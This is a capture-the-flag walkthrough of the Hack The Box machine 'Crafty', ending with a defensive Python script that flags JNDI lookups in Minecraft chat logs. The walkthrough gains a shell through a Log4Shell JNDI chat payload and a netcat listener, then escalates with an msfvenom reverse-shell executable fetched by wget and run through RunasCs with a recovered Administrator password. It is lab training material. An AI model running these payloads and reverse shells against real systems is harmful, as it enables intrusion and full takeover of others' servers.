## User Flag

### NMAP Scan

```shell
TCPPORTS=$(nmap -sT -p- --min-rate=1000 -T4 $TARGETIP | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'); sudo nmap -p$TCPPORTS -sTVC -O $TARGETIP --open
```

```shell
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 11:47 MST
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.13s latency).

PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Crafty - Official Website
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds
```

### Enumeration

I can see that there is a web page available and what looks like a Minecraft server.

`NOTE: This is why it's important to scan all ports, as the Minecraft port will not show up in a top-1000-port scan`

#### Webpage

Visiting the web page shows me a Minecraft-themed site:

![[Pasted image 20240221115859.png]]

There is nothing of interest on the site; all the buttons lead to a page stating the feature is 'coming soon'. So the way into the server must be through the Minecraft port. I believe this is going to involve the widespread Log4j vulnerability (Log4Shell), as that was first discovered in a Minecraft server.

#### Minecraft Server

First I have to find a way to interact with the Minecraft server.
I can also see from my nmap scan that the server is running Minecraft version 1.16.5, so I need a client that can talk to that version. After some googling I found a launcher called TLauncher, which lets me install and launch a specific version of Minecraft. I can launch it with the command:

```shell
sudo java -jar ./TLauncher-2.895.jar
```

![[Pasted image 20240221124808.png]]

In the window, I am able to choose the correct version of Minecraft to interact with the server.

![[Pasted image 20240221172918.png]]

### Preparing Log4j

I can see that I am in game and the version is 1.16.5. Now I need to find a way to exploit the vulnerable Log4j on the server. A quick search yields [kozmer's](https://github.com/kozmer/log4j-shell-poc) Log4j shell PoC on GitHub, which I download with the following command:

```shell
git clone https://github.com/kozmer/log4j-shell-poc
```

The exploit states that it needs a specific version of Java in order to function correctly. Luckily, the author included instructions on how to download the correct version. I can navigate to the [Java Download Page](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) and follow the screenshot to download the correct version of Java. I can then run the exploit with the following command:

```shell
python3 poc.py --userip 10.10.14.2 --webport 1236 --lport 9001
```

![[Pasted image 20240221182302.png]]

This sets up a web server that we can call from within the Minecraft server to get a shell. However, since the vulnerable server is a Windows machine, we need to change the exploit to use either `cmd.exe` or `powershell.exe` instead of the current `/bin/sh`. I changed it to PowerShell, because PowerShell should give me more options.

### Exploiting Log4j

We now have everything we need to exploit the server. We can launch into the game and connect to the server.
I will also briefly go over how to connect to the server using another tool that lets us interact with it without being in the game.

![[Pasted image 20240221182916.png]]
![[Pasted image 20240221182943.png]]

I can now join the server, and it puts me inside a Minecraft game.

![[Pasted image 20240221183745.png]]

When I set up the web server hosting the payload, the PoC told me to send the string `${jndi:ldap://10.10.14.2:1389/a}`. I can open the chat in game and send this message while running a listener on my attacker machine, and I should get a shell.

```shell
nc -lvnp 9001
```

![[Pasted image 20240221184322.png]]

Looking at my listener after sending the string in the in-game chat, I can see that I now have a shell.

![[Pasted image 20240221184419.png]]

I can find the user flag on the svc_minecraft user's desktop. User flag has been taken.

#### PyCraft

We can also use a program called [PyCraft](https://github.com/ammaraskar/pyCraft), found on GitHub. This lets us send chat messages without having to launch Minecraft itself.

```shell
git clone https://github.com/ammaraskar/pyCraft
```

I can run the program with:

```shell
python3 start.py -u user -s 10.10.11.249:25565
```

Once I am connected, with the web server running to deliver my exploit to the machine, I can send the same string `${jndi:ldap://10.10.14.2:1389/a}` and get a shell.

![[Pasted image 20240221185055.png]]

`NOTE: The errors are normal; it should throw errors once your shell is connected.`

## Root Flag

### Enumeration

After gaining the user flag, I want to go back to the directory I landed in and see if there is anything useful there.

![[Pasted image 20240221191004.png]]

I looked at all the text and JSON files in the root of the server directory and decided to look into some of the folders. I chose the logs folder to see if anything had been logged that would expose some secrets on the server.
I can see the message that I sent as a test, "hello", but nothing else of interest. I will check out the plugins folder next.

![[Pasted image 20240222095021.png]]

I see that there is a JAR file in there that might contain something interesting. Since I used pwncat for my shell, I can download it to my machine.

![[Pasted image 20240222143818.png]]
![[Pasted image 20240222143947.png]]

I can see there is an htb folder, and inside it is a Java class file.

![[Pasted image 20240222144038.png]]

However, I cannot just open the file, as it needs to be decompiled. Luckily VS Code has extensions for Java that will decompile the class file.

![[Pasted image 20240222144449.png]]

I see something that looks like a password, and after googling what RCON is, I conclude that it is most likely a password.

![[Pasted image 20240222144713.png]]

Now that I have a password, I can try to use it to gain an administrative shell on the server. My first attempt is going to be with [RunasCS.exe](https://github.com/antonioCoco/RunasCs). But first I need to get it onto the server and figure out what my payload will be. I can use pwncat, or wget with a web server, to get both files onto the server, and use [[MSFVenom]] to craft a payload.

```shell
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=tun0 LPORT=1239 -f exe -o s.exe
```

To transfer the files I serve them from my machine:

```shell
python3 -m http.server 9000
```

and fetch them from the target:

```powershell
wget http://10.10.14.2:9000/RunasCs.exe -O RunasCs.exe
```

![[Pasted image 20240222145507.png]]
![[Pasted image 20240222145550.png]]

Now that both files are on the target, I can use them to run an administrator shell. But first I have to start a listener.

```shell
nc -lvnp 1239
```

Now that I have my listener running, I use RunasCs with:

```powershell
.\RunasCs.exe Administrator s67u84zKq8IXw s.exe
```

I can see that I got a reverse shell and I am now the Administrator user. I found the root flag, and the machine is now rooted.

![[Pasted image 20240223075623.png]]
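The Log4j payload on this box arrived through the in-game chat, and the server's logs folder records every chat line, so this is where a defender can catch it. As an added example (not from the writeup or any of the tools above), this Python script parses constructed `latest.log`-style lines and reports JNDI lookups, including ones hidden behind the nested lookups Log4j resolves before the JNDI one; the sample log lines, player names and the 192.0.2.10 host are constructed.

```python
import re

# Constructed sample lines in the shape of a Minecraft server's logs/latest.log
# (not taken from the page); the first lookup string matches the one the writeup sent.
SAMPLE_LOG = """\
[18:40:01] [Server thread/INFO]: player1 joined the game
[18:40:12] [Server thread/INFO]: <player1> hello
[18:43:22] [Server thread/INFO]: <player1> ${jndi:ldap://10.10.14.2:1389/a}
[18:44:05] [Server thread/INFO]: <player2> ${${lower:j}ndi:rmi://192.0.2.10:1099/x}
[18:45:30] [Server thread/INFO]: player1 left the game
"""

# "[HH:MM:SS] [thread/LEVEL]: <name> message" is the chat line layout in latest.log
CHAT_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[[^\]]+\]: <([^>]+)> (.*)$")
# Nested lookups Log4j resolves before the JNDI lookup: ${lower:j}, ${upper:J}, ${::-j}
NESTED_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{:*-([^${}]*)\}")
# Scheme and callback host of the lookup, e.g. ldap and 10.10.14.2:1389
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.I)


def normalize(message):
    """Collapse nested lookups to their literal value so the jndi prefix is visible."""
    previous = None
    while previous != message:
        previous = message
        message = NESTED_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), message
        )
    return message


def find_jndi_lookups(log_text):
    """Return (time, player, scheme, callback_host) for every chat line carrying a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        chat = CHAT_RE.match(line)
        if not chat:
            continue  # join/leave and other server messages are not chat
        when, player, message = chat.groups()
        lookup = JNDI_RE.search(normalize(message))
        if lookup:
            hits.append((when, player, lookup.group(1).lower(), lookup.group(2)))
    return hits


if __name__ == "__main__":
    for when, player, scheme, host in find_jndi_lookups(SAMPLE_LOG):
        print(f"{when} {player} sent a {scheme} JNDI lookup pointing at {host}")
```

The callback host is the value worth alerting on and blocking at the egress firewall, since the lookup only becomes a shell when the server can reach it.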